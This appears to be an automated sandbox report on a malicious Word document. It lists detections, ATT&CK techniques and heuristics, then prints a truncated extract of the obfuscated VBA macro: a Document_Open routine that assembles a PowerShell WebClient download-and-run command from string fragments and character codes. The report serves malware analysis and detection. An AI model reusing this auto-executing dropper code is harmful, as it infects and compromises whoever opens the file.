MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Document_Open macro triggers the execution of a PowerShell command, which is obfuscated within the VBA code. This PowerShell command is designed to download and execute a second-stage payload from a benign-looking URL, which is highly suspicious. The ClamAV detection further confirms its malicious nature.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6608821-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6608821-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 52747 bytes |
SHA-256: 267ba0069fafdd6134314f6bf74d43f1cc7fcb3770967fcc667225cb3c11e271 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BbNOhYUipB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
jrIEw = QiwnF / wJsFj + (qnwPW - wIDkN / (35832 - 4421 + fZkPi - wikEH))
sHVDL = FTTsN / FQQvsN + (dEniQ - ziZoS / (30403 - 61733 + XRMwh - nzMzlX))
tPSOh = Application.Run("nnYMLmYRVC", "" + FwRuaoXaJUUl + FfQdlwlWYcbKI + woSmvc + KAscvzY + SZFdQvZLv + FaNzPzi + PrbiQa + mHhRLzuFGB + mbNqFvIawX + BPBiQHklNan + XXliXjZU + EObfIX + wiNzMsZsr + WjEbnWAjDc + AjlNDirku + hWVPiajkjIk + MbrbhE + hHIaZbjt + tEjAm + iwQrTSFRwRT + Hhizziw + FhLUjfAchWh)
OYQJBm = mVCLi / JLtkD + (TVNVM - BiUwwh / (54806 - 84475 + EIjwoD - UiiLCb))
wLPVd = qssKSc / GkSjk + (Mitzl - ThwIp / (79525 - 98746 + DlXhi - FNkMX))
UAJCaW = DDYzD / nXVimb + (DNlPR - AfnAiZ / (83486 - 51687 + wXaRDD - cZozE))
End Sub
Attribute VB_Name = "McQAmqGO"
Function woSmvc()
On Error Resume Next
dAOTz = tRFEV * sImui + (JkLIU * FNlKEw)
VdjfSS = "" + KhlJwYzpUTdr + YaruTLE + "POw" + jlNjTiMIsC + aAljjMvqorks + "ersh" + jNCsGfSM + kpiGHLlpjW + "eL" + GNkzJAjpAV + zzFzwBOO + "l " + vuioicFvL + JHoHHVRfQ + " " + Chr(34) + "(" + PXHHGlsfH + tSqRURDjEJm + " ( 3" + sQsofzifpjiLh + UDffjfOWRq + "6," + cjSFcfRPptEAKA + lLGnqhO + " 7" + GKJitawizGw + BfPLjbwfVjj + "5 " + GkNIuSQcVUHk + GWNuAfLJa + ",8" + AnDwlidTJUN + LjGwjKHblIsII + "3 , "
woSmvc = "" + iZwJodtiNdk + RmwsFYiUZMd + VdjfSS
EPfKp = (55398 * zojXEc)
End Function
Function KAscvzY()
On Error Resume Next
sUvUd = (19048 * JACjDL)
vHbXqJsXmq = "" + tYZizDoHz + DaodOQSjsiv + "116 "
RVJmtq = (74071 * WEKEkn)
Ksqqkq = "" + nXwhviMZVms + kzkfNdtBOH + ",61" + jWdZddQqLuYqM + zNYDuJBTNTFZ + " ,11" + iYQCoOMjzrIbiI + tSrrvoqDzj + "0 ," + QFYDsuh + oYHaONjv + " 101" + sdoZmihAqiM + jJStSEj + " ,1" + UQEujQhaJHj + ZbflVKuqnvmT + "19" + vTNqjnQJY + wQSPYEVwwkrNh + ",45 " + tkjUSaLzmG + zUVPDKtWt + ", 11" + PqRWcjEFjGL + dEDRnRjIcnX + "1," + UnDnMiRJRdA + ThAOKmZpmzHb + " 98,"
aYFNf = wKYaHq - dbHhQ / HihBuE + qhJsM + (61024 / RHQqw / 95709 * YhGwz)
vSmDtt = LQCtu - dWLaCN / wwHOc + DkiovL + (56412 / VriZH / 19024 * HRwVQG)
wcCGjCpuv = "" + qrnzcootWKJ + PAfObjwVKQjSG + " 106" + aCukEMqSEMDTcO + oojIjbjYjSI + " ," + EjVErTUPYFb + aCYQWHQkviWa + " 101" + SWBlELsAfhOluZ + iIjwAjzTw + " ,9" + pICziaTBs + XNpZXqBkNr + "9, " + vNqSwlXhpDw + dikLaXYrPlWJb + "116," + RLnXWdGl + VQVqiTRm + "32 " + IRZmTuojcUIXcN + QYjOXwzDFHD + ", 78" + REWtOBAmBEbo + SzznHaAD + ",10" + SXLUVjMr + LPliNMOrOTEazn + "1, 1" + HTvakOL + rpjQUrjCdzD + "16,"
oqSAws = EZdht - hUFjOc / AvzjXR + VDFrc + (98912 / jhBocz / 43763 * altfpj)
avLIo = CsZYp - ZtvML / EVDVWi + ucUXUp + (52228 / nszObZ / 73554 * iRQqw)
zXfwmW = "" + cWJzssichkvB + FuSBmEumiPNV + "46 ," + rcbHrXPGqjooS + NbmHAolWiaInpr + "87," + XhtkEIoJvVwE + wlirRoaN + " 10" + GGwjjka + wRHZaqEmdLiqjj + "1 ," + WEwaFJJWsiw + ZKvjHqvq + " 98," + AMBzBjKZ + ENjboqmHkjw + "67 ," + fDBiGZtWlKwzN + HphEbjCM + " 108" + vRDnGfLITV + zDAcITD + " , 1" + alaAuzsQMcr + LHpifilpu + "05" + GrdDwXjJu + fdnLjTrHsB + ", 1" + ssnanYwpjDHt + oRoticZpcL + "01,1"
jVaVm = SElIX - NmEroc / Qfiwl + ZVnVs + (76928 / TYRzAh / 66756 * QzicHJ)
haAApA = nnXTq - cziukQ / KOHvPj + OaATbC + (41457 / jCQlf / 14938 * tUaWso)
wSzmp = cIlKL - vkvzpc / tIKiZ + zTAJC + (31591 / jTZjst / 25381 * QukdGr)
iSFhSCJhH = "" + iiQfdWEXp + zfjtUjipV + "10" + GtJzhzViKBPWm + IqBMaLjVBl + ",1" + HXfilKsbXWdp + LqMiIwj + "16," + nnIffaYHOTN + iSiMuhA + " 59 " + MHZApITd + KwrvcfM + ",3" + PPVsnELuEwCCwp + BFikPolBLDJ + "6 ,8" + BhhjBWzqOm + OOjPzNHRTbZ + "2 " + jadUjkvYX + UWuSckmTj + ",89," + ZElLpCV + IzPSwUVhCAF + " 122"
mMHHCW = LaWqTf - koPJW / ntmYiV + rETBqZ + (26679 / rJbzof / 52003 * MfuBB)
SvdTo = ioFwKh - ZjVus / UcGUG + VIPERj + (760 / OmpiW / 26131 * UlCBFl)
OIwVkdqhr = "" + vPJHsaidhXrG + AtRqsioMhG + " , 6" + atkTwpqhGbQ + RbwQRnUIrfBk + "1,3
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.